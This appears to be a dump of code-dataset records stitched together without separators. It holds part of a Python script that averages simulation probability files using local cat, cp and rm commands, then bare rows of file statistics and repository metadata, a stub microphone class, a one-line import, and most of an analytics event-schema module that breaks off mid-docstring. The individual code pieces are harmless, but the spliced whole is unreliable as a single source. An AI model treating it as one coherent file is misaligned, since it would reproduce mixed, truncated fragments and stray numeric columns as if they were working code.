[2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "3. Switching after 1 h/OVERLAP10 no AC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "3. Switching after 1 h/OVERLAP10 no AC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_1h_OVERLAP10_noAC_noABC.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "3. Switching after 1 h/OVERLAP10 no BC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "3. Switching after 1 h/OVERLAP10 no BC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "3. Switching after 1 h/OVERLAP10 no BC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_1h_OVERLAP10_noBC_noABC.txt", remove_raw=True, sep_str='\n') os.system('cat "p_act_1h_NOOVERLAP.txt" > "p_act_summary_temp_1h.txt"') os.system('cat "p_act_1h_OVERLAP10.txt" >> "p_act_summary_temp_1h.txt"') os.system('cat "p_act_1h_OVERLAP10_noAC_noABC.txt" >> "p_act_summary_temp_1h.txt"') os.system('cat "p_act_1h_OVERLAP10_noBC_noABC.txt" >> "p_act_summary_temp_1h.txt"') os.system('rm -R -f "p_act_1h"*') mergeRawData(".", "p_act_summary_temp_", "p_act_summary_1h.txt", remove_raw=False, sep_str='\t') os.system('rm -f p_act_summary_temp_1h.txt') # 4 h averageFileColumns("p_act_averaged_Aprimed", "4. Switching after 4 h/NOOVERLAP/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "4. Switching after 4 h/NOOVERLAP/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "4. Switching after 4 h/NOOVERLAP/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_4h_NOOVERLAP.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "4. Switching after 4 h/OVERLAP10/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "4. Switching after 4 h/OVERLAP10/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "4. Switching after 4 h/OVERLAP10/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_4h_OVERLAP10.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "4. Switching after 4 h/OVERLAP10 no AC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "4. Switching after 4 h/OVERLAP10 no AC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "4. Switching after 4 h/OVERLAP10 no AC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_4h_OVERLAP10_noAC_noABC.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "4. Switching after 4 h/OVERLAP10 no BC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "4. Switching after 4 h/OVERLAP10 no BC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "4. Switching after 4 h/OVERLAP10 no BC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_4h_OVERLAP10_noBC_noABC.txt", remove_raw=True, sep_str='\n') os.system('cat "p_act_4h_NOOVERLAP.txt" > "p_act_summary_temp_4h.txt"') os.system('cat "p_act_4h_OVERLAP10.txt" >> "p_act_summary_temp_4h.txt"') os.system('cat "p_act_4h_OVERLAP10_noAC_noABC.txt" >> "p_act_summary_temp_4h.txt"') os.system('cat "p_act_4h_OVERLAP10_noBC_noABC.txt" >> "p_act_summary_temp_4h.txt"') os.system('rm -R -f "p_act_4h"*') mergeRawData(".", "p_act_summary_temp_", "p_act_summary_4h.txt", remove_raw=False, sep_str='\t') os.system('rm -f p_act_summary_temp_4h.txt') # 7 h averageFileColumns("p_act_averaged_Aprimed", "5. Switching after 7 h/NOOVERLAP/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "5. Switching after 7 h/NOOVERLAP/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "5. Switching after 7 h/NOOVERLAP/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_7h_NOOVERLAP.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "5. Switching after 7 h/OVERLAP10/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "5. Switching after 7 h/OVERLAP10/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "5. Switching after 7 h/OVERLAP10/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_7h_OVERLAP10.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "5. Switching after 7 h/OVERLAP10 no AC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "5. Switching after 7 h/OVERLAP10 no AC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "5. Switching after 7 h/OVERLAP10 no AC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_7h_OVERLAP10_noAC_noABC.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "5. Switching after 7 h/OVERLAP10 no BC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "5. Switching after 7 h/OVERLAP10 no BC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "5. Switching after 7 h/OVERLAP10 no BC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_7h_OVERLAP10_noBC_noABC.txt", remove_raw=True, sep_str='\n') os.system('cat "p_act_7h_NOOVERLAP.txt" > "p_act_summary_temp_7h.txt"') os.system('cat "p_act_7h_OVERLAP10.txt" >> "p_act_summary_temp_7h.txt"') os.system('cat "p_act_7h_OVERLAP10_noAC_noABC.txt" >> "p_act_summary_temp_7h.txt"') os.system('cat "p_act_7h_OVERLAP10_noBC_noABC.txt" >> "p_act_summary_temp_7h.txt"') os.system('rm -R -f "p_act_7h"*') mergeRawData(".", "p_act_summary_temp_", "p_act_summary_7h.txt", remove_raw=True, sep_str='\t') os.system('cp "./1. Priming/NOOVERLAP/A/"*/*"_PARAMS.txt" .')
66.644444
185
0.740191
2,832
17,994
4.401483
0.085099
0.041075
0.061613
0.115523
0.812836
0.803771
0.780345
0.775531
0.752106
0.730927
0
0.041032
0.106091
17,994
269
186
66.892193
0.733914
0.120096
0
0.198925
0
0
0.529389
0.317954
0
0
0
0
0
1
0.005376
false
0.016129
0.021505
0
0.026882
0.016129
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
984bf4d47f4e3b90155ff87bcaf2dff08b64ae08
252
py
Python
client/hardware_interface/microphone/base_mic.py
sgang007/audio_chat_client
e2c1caf6ec1a781be0d22f516e55434099514da1
[ "MIT" ]
null
null
null
client/hardware_interface/microphone/base_mic.py
sgang007/audio_chat_client
e2c1caf6ec1a781be0d22f516e55434099514da1
[ "MIT" ]
null
null
null
client/hardware_interface/microphone/base_mic.py
sgang007/audio_chat_client
e2c1caf6ec1a781be0d22f516e55434099514da1
[ "MIT" ]
null
null
null
class BaseMic(object): def __init__(self, *args, **kwargs): pass def set(self): pass def tune(self): pass def listen(self): pass def reset(self): pass def record(self): pass
12.6
40
0.5
29
252
4.206897
0.482759
0.286885
0.360656
0
0
0
0
0
0
0
0
0
0.396825
252
19
41
13.263158
0.802632
0
0
0.461538
0
0
0
0
0
0
0
0
0
1
0.461538
false
0.461538
0
0
0.538462
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
6
984d45b81d44e03fe997fb440c7834ce7367d134
29
py
Python
src/__init.py
melodypapa/py-armodel
65a6a94a2b880d6b7cf43061c507761b3b9bc88a
[ "MIT" ]
2
2021-08-31T07:48:05.000Z
2022-03-30T19:04:08.000Z
src/__init.py
melodypapa/py-armodel
65a6a94a2b880d6b7cf43061c507761b3b9bc88a
[ "MIT" ]
null
null
null
src/__init.py
melodypapa/py-armodel
65a6a94a2b880d6b7cf43061c507761b3b9bc88a
[ "MIT" ]
1
2022-01-29T04:47:41.000Z
2022-01-29T04:47:41.000Z
from .ar_model import AUTOSAR
29
29
0.862069
5
29
4.8
1
0
0
0
0
0
0
0
0
0
0
0
0.103448
29
1
29
29
0.923077
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
98531634cad36d3bca5abd26b98c4081149f1af5
60,828
py
Python
backend/objectiv_backend/schema/schema.py
objectiv/objectiv-analytics
86ec1508f71c2d61ea7d67479800e4dc417a46e1
[ "Apache-2.0" ]
23
2021-11-10T21:37:42.000Z
2022-03-30T11:46:19.000Z
backend/objectiv_backend/schema/schema.py
objectiv/objectiv-analytics
86ec1508f71c2d61ea7d67479800e4dc417a46e1
[ "Apache-2.0" ]
163
2021-11-10T10:11:26.000Z
2022-03-31T16:04:27.000Z
backend/objectiv_backend/schema/schema.py
objectiv/objectiv-analytics
86ec1508f71c2d61ea7d67479800e4dc417a46e1
[ "Apache-2.0" ]
null
null
null
from typing import List, Dict, Any, Optional from abc import ABC from objectiv_backend.schema.schema_utils import SchemaEntity class AbstractContext(SchemaEntity, ABC): """ AbstractContext defines the bare minimum properties for every Context. All Contexts inherit from it. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'AbstractContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ SchemaEntity.__init__(self, id=id, **kwargs) class AbstractGlobalContext(AbstractContext, ABC): """ This is the abstract parent of all Global Contexts. Global contexts add general information to an Event. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'AbstractGlobalContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractContext.__init__(self, id=id, **kwargs) class ApplicationContext(AbstractGlobalContext): """ A GlobalContext describing in which app the event happens, like a website or iOS app. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'ApplicationContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__(self, id=id, **kwargs) class CookieIdContext(AbstractGlobalContext): """ Global context with information needed to reconstruct a user session. Attributes: cookie_id (str): Unique identifier from the session cookie id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'CookieIdContext' def __init__(self, cookie_id: str, id: str, **kwargs: Optional[Any]): """ :param cookie_id: Unique identifier from the session cookie :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__( self, cookie_id=cookie_id, id=id, **kwargs) class HttpContext(AbstractGlobalContext): """ A GlobalContext describing meta information about the agent that sent the event. Attributes: referrer (str): Full URL to HTTP referrer of the current page. user_agent (str): User-agent of the agent that sent the event. remote_address (str): (public) IP address of the agent that sent the event. id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'HttpContext' def __init__(self, referrer: str, user_agent: str, id: str, remote_address: str = None, **kwargs: Optional[Any]): """ :param referrer: Full URL to HTTP referrer of the current page. :param user_agent: User-agent of the agent that sent the event. :param remote_address: (public) IP address of the agent that sent the event. :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__(self, referrer=referrer, user_agent=user_agent, remote_address=remote_address, id=id, **kwargs) class PathContext(AbstractGlobalContext): """ A GlobalContext describing the path where the user is when an event is sent. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'PathContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__(self, id=id, **kwargs) class SessionContext(AbstractGlobalContext): """ A GlobalContext describing meta information about the current session. Attributes: hit_number (int): Hit counter relative to the current session, this event originated in. id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'SessionContext' def __init__(self, hit_number: int, id: str, **kwargs: Optional[Any]): """ :param hit_number: Hit counter relative to the current session, this event originated in. :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__( self, hit_number=hit_number, id=id, **kwargs) class MarketingContext(AbstractGlobalContext): """ a context that captures marketing channel info, so users can do attribution, campaign effectiveness and other models Attributes: source (str): Identifies the advertiser, site, publication, etc medium (str): Advertising or marketing medium: cpc, banner, email newsletter, etc campaign (str): Individual campaign name, slogan, promo code, etc term (str): [Optional] Search keywords content (str): [Optional] Used to differentiate similar content, or links within the same ad source_platform (str): [Optional] To differentiate similar content, or links within the same ad. creative_format (str): [Optional] Identifies the creative used (e.g., skyscraper, banner, etc). marketing_tactic (str): [Optional] Identifies the marketing tactic used (e.g., onboarding, retention, acquisition etc). id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'MarketingContext' def __init__(self, source: str, medium: str, campaign: str, id: str, term: str = None, content: str = None, source_platform: str = None, creative_format: str = None, marketing_tactic: str = None, **kwargs: Optional[Any]): """ :param source: Identifies the advertiser, site, publication, etc :param medium: Advertising or marketing medium: cpc, banner, email newsletter, etc :param campaign: Individual campaign name, slogan, promo code, etc :param term: [Optional] Search keywords :param content: [Optional] Used to differentiate similar content, or links within the same ad :param source_platform: [Optional] To differentiate similar content, or links within the same ad. :param creative_format: [Optional] Identifies the creative used (e.g., skyscraper, banner, etc). :param marketing_tactic: [Optional] Identifies the marketing tactic used (e.g., onboarding, retention, acquisition etc). :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__(self, source=source, medium=medium, campaign=campaign, term=term, content=content, source_platform=source_platform, creative_format=creative_format, marketing_tactic=marketing_tactic, id=id, **kwargs) class AbstractLocationContext(AbstractContext, ABC): """ AbstractLocationContext are the abstract parents of all Location Contexts. Location Contexts are meant to describe where an event originated from in the visual UI. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'AbstractLocationContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractContext.__init__(self, id=id, **kwargs) class InputContext(AbstractLocationContext): """ A Location Context that describes an element that accepts user input, i.e. a form field. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'InputContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class PressableContext(AbstractLocationContext): """ An Location Context that describes an interactive element (like a link, button, icon), that the user can press and will trigger an Interactive Event. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'PressableContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class LinkContext(PressableContext): """ A PressableContext that contains an href. Attributes: href (str): URL (href) the link points to. id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'LinkContext' def __init__(self, href: str, id: str, **kwargs: Optional[Any]): """ :param href: URL (href) the link points to. :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ PressableContext.__init__(self, href=href, id=id, **kwargs) class RootLocationContext(AbstractLocationContext): """ A Location Context that uniquely represents the top-level UI location of the user. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'RootLocationContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class ExpandableContext(AbstractLocationContext): """ A Location Context that describes a section of the UI that can expand & collapse. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'ExpandableContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class MediaPlayerContext(AbstractLocationContext): """ A Location Context that describes a section of the UI containing a media player. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'MediaPlayerContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class NavigationContext(AbstractLocationContext): """ A Location Context that describes a section of the UI containing navigational elements, for example a menu. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'NavigationContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class OverlayContext(AbstractLocationContext): """ A Location Context that describes a section of the UI that represents an overlay, i.e. a Modal. . Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'OverlayContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class ContentContext(AbstractLocationContext): """ A Location Context that describes a logical section of the UI that contains other Location Contexts. Enabling Data Science to analyze this section specifically. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'ContentContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class AbstractEvent(SchemaEntity, ABC): """ This is the abstract parent of all Events. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'AbstractEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ SchemaEntity.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class InteractiveEvent(AbstractEvent): """ The parent of Events that are the direct result of a user interaction, e.g. a button click. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'InteractiveEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ AbstractEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class NonInteractiveEvent(AbstractEvent): """ The parent of Events that are not directly triggered by a user action. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'NonInteractiveEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ AbstractEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class ApplicationLoadedEvent(NonInteractiveEvent): """ A NonInteractive event that is emitted after an application (eg. SPA) has finished loading. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'ApplicationLoadedEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class FailureEvent(NonInteractiveEvent): """ A NonInteractiveEvent that is sent when a user action results in a error, like an invalid email when sending a form. Attributes: message (str): Failure message. location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'FailureEvent' def __init__(self, message: str, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param message: Failure message. :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, message=message, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class InputChangeEvent(InteractiveEvent): """ Event triggered when user input is modified. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'InputChangeEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ InteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class PressEvent(InteractiveEvent): """ An InteractiveEvent that is sent when a user presses on a pressable element (like a link, button, icon). Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'PressEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ InteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class HiddenEvent(NonInteractiveEvent): """ A NonInteractiveEvent that's emitted after a LocationContext has become invisible. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, 